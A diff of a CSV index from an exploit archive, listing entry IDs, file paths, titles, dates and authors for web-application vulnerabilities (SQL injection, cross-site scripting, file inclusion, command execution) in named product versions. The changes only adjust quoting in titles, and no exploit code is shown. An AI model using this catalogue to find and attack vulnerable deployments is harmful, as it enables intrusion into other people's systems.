24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 -24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0 +24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 @@ -27716,7 +27718,7 @@ id,file,description,date,author,platform,type,port 24464,platforms/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 @@ -27728,7 +27730,7 @@ id,file,description,date,author,platform,type,port 24483,platforms/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - 'install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 @@ -27739,11 +27741,11 @@ id,file,description,date,author,platform,type,port 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid' Parameter SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0 @@ -27752,11 +27754,11 @@ id,file,description,date,author,platform,type,port 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 +24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id' Parameter SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,cr4wl3r,php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php title' Parameter Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 @@ -27816,9 +27818,9 @@ id,file,description,date,author,platform,type,port 24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0 24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - 'announcement.php' 'cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x - 'news.php' 'cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x - 'contents.php' 'cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 +24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - 'announcement.php cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 +24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x - 'news.php cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 +24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x - 'contents.php cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,asp,webapps,0 @@ -27893,12 +27895,12 @@ id,file,description,date,author,platform,type,port 24821,platforms/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - Gedrecord.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24822,platforms/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - Gdbi_interface.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 -24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php' 'Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php' 'Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' 'Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php' 'Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php' 'Username' Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php Username' Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - Relationship.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24834,platforms/php/webapps/24834.txt,"PHPGedView 2.5/2.6 - calendar.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 @@ -27918,7 +27920,7 @@ id,file,description,date,author,platform,type,port 24858,platforms/php/webapps/24858.html,"WordPress Plugin Occasions 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 24859,platforms/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php' 'list_id' Parameter SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id' Parameter SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - 'Username'/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 24867,platforms/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 @@ -27934,10 +27936,10 @@ id,file,description,date,author,platform,type,port 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid' Parameter SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 -24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php' 'p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php what' Parameter Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 @@ -27947,7 +27949,7 @@ id,file,description,date,author,platform,type,port 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,hardware,webapps,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 -24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash Parameter SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash' Parameter SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24969,platforms/php/webapps/24969.txt,"Joomla! Component com_civicrm 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 @@ -28192,9 +28194,9 @@ id,file,description,date,author,platform,type,port 25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.asp Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php add' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - Module Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 @@ -28247,7 +28249,7 @@ id,file,description,date,author,platform,type,port 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25440,platforms/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php id' Parameter SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 @@ -28440,11 +28442,11 @@ id,file,description,date,author,platform,type,port 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php module' Parameter Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25721,platforms/php/webapps/25721.txt,"WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php playlist_id' Parameter SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 @@ -28501,7 +28503,7 @@ id,file,description,date,author,platform,type,port 33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,php,webapps,0 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 -33425,platforms/php/webapps/33425.py,"SPIP - CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80 +33425,platforms/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 @@ -28520,7 +28522,7 @@ id,file,description,date,author,platform,type,port 25796,platforms/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - editCategories.asp lid Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25797,platforms/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - modCustomCardPaymentOpt.asp idc Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25798,platforms/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - OptionFieldsEdit.asp idccr Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 -25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 +25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php where' Parameter Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x - help.php Multiple Parameter Cross-Site Scripting",2005-06-07,SecWatch,php,webapps,0 25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 @@ -28597,13 +28599,13 @@ id,file,description,date,author,platform,type,port 25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 -25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php' 'Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php' 'Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25900,platforms/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php' 'message' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25901,platforms/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php' 'main' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php' 'Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php' 'posted' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25900,platforms/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php message' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25901,platforms/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php main' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php posted' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25904,platforms/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps,0 25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 - forgot_password.asp email Parameter Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - register.asp Multiple Parameter Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 @@ -28620,7 +28622,7 @@ id,file,description,date,author,platform,type,port 25920,platforms/cgi/webapps/25920.pl,"Community Link Pro - login.cgi File Parameter Remote Command Execution",2005-06-29,spher3,cgi,webapps,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - 20review.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - 10expand.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 